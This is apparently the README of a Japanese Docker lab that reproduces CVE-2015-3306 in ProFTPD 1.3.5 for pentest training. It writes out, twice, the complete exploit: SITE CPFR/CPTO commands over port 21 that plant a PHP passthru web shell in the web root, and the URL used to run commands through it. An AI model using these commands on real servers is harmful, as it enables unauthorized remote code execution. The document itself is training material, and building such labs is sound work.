
CVE-2015-3306 - ProFTPD - RCE ホームラボセットアップ(Docker) - レッドチーム演習やペネトレーションテストに使いやすい
このラボは、CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE の脆弱性をシミュレートするために設計されています。
ProFTPD の mod_copy モジュールを介した Web Shell Injection RCE の学習用です。
mod_copy をフルで有効化 (SITE CPFR / SITE CPTO)/var/www/html を再現する Apache2 + PHP5flag_RANDOM.txt を自動生成/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
ブラウザでアクセス:
http://<IP>/webshell.php?cmd=<command>
保存場所:
/tmp/flag_RANDOM.txt
このラボは、mod_copy を備えた ProFTPD 1.3.5 を使用して CVE-2015-3306 をシミュレートし、攻撃者が ProFTPD mod_copy Remote File Copy to RCE を実行できるようにします。
mod_copy 有効 (SITE CPFR + SITE CPTO)flag_RANDOM.txt を自動生成nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
次に実行:
http://<IP>/webshell.php?cmd=<command>
/tmp/flag_RANDOM.txt
教育目的および許可を得たペネトレーションテストにのみ使用してください。